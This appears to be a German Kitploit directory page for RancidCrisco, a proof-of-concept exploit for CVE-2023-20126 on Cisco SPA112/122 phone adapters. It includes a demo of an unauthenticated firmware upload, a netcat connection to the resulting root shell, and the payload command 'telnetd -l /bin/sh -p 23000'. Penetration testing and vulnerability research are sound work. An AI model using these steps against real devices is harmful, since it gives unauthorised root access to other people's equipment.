Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
RancidCrisco — Proof-of-Concept-Exploit für CVE-2023-20126, der Cisco SPA-Telefonadapter angreift. Lädt bösartige Firmware hoch, um eine Root-Shell auf Port 23000/tcp über telnetd zu erhalten. | Kitploit
Tools/GitHubGitHub/fullspectrumdev/rancidcrisco
Embedded-System-SicherheitSchwachstellenanalyseExploitationPenetrationstestsHardware- & IoT-SicherheitRed TeamingRemote-Access-ToolFirmware-Analyse
GitHubfullspectrumdev/rancidcrisco

RancidCrisco

Proof-of-Concept-Exploit für CVE-2023-20126, der Cisco SPA-Telefonadapter angreift. Lädt bösartige Firmware hoch, um eine Root-Shell auf Port 23000/tcp über telnetd zu erhalten.

24217vor 3 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen

RancidCrisco

Minimum Viable PoC für CVE-2023-20126

Dies ist die erste Veröffentlichung. Sie funktioniert, aber es ist der 'einfachste Fall' Exploit.

Getestet und funktioniert auf SPA112/SPA122 - SPA232D erfordert ein anderes Firmware-Image.

Gibt eine Root-Shell auf Port 23000/tcp.

Ich muss noch die Toolchain aufräumen, die zum Bearbeiten der Firmware verwendet wurde, und werde das wahrscheinlich in ein anderes Repository stellen. Sie basiert hauptsächlich auf der Arbeit von @BigNerd95, jedoch mit kleinen Änderungen, um mit den SPA112/122 Firmware-Dateien zu funktionieren.

Demo.

root@kitploit:~
$ python3 CVE-2023-20126.py http://192.168.0.152 CFW.bin 
Base URL: http://192.168.0.152
Firmware File: CFW.bin
Sending firmware update...
Firmware upgrade successful. Device will reboot eventually and be running the new FW.

< wait a few mins, nervously > 

$ nc -v 192.168.0.152 23000
Connection to 192.168.0.152 port 23000 [tcp/inovaport1] succeeded!
????????


BusyBox v1.10.2 (2019-10-14 12:41:41 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# id;uname -a;pwd
id;uname -a;pwd
uid=0(admin) gid=0(admin)
Linux SPA112 2.6.26.5 #1 PREEMPT Sun Sep 6 10:54:57 CST 2015 armv5tejl unknown
/
# cat /etc/version
cat /etc/version
router_major_version:1.4.1
router_minor_version:SR5
build_date:Mon Oct 14 12:48:12 CST 2019
build_version:6735
hardware_version:1.1.0

Dateien

  • fwupload.py - Firmware-Image-Uploader, der die Authentifizierung umgeht, indem er einfach keine sendet, und CVE-2023-20126 ausnutzt. Nimmt zwei Argumente entgegen: URL des Web-UI des Geräts und die hochzuladende Firmware-Datei.
  • telnet-23000.bin - Proof-of-Concept bösartiges Firmware-Image, das telnetd -l /bin/sh -p 23000 startet und eine Root-Shell auf Port 23000/tcp bereitstellt. Basierend auf der Arbeit von bignerd95.

Lizenz

WTFPL.

Fehler

Git-Issue verwenden.

Haftungsausschluss

Falls dies dein verdammtes Gerät zerstört, übernehme ich keinerlei Verantwortung.
Das ist DEIN Problem.
Ich meine, ich habe diese hintertürige Firmware an einem Abend zusammengehackt.
Außerdem, warum folgst du nicht der Anleitung und baust deine eigene hintertürige Firmware?

Tool herunterladen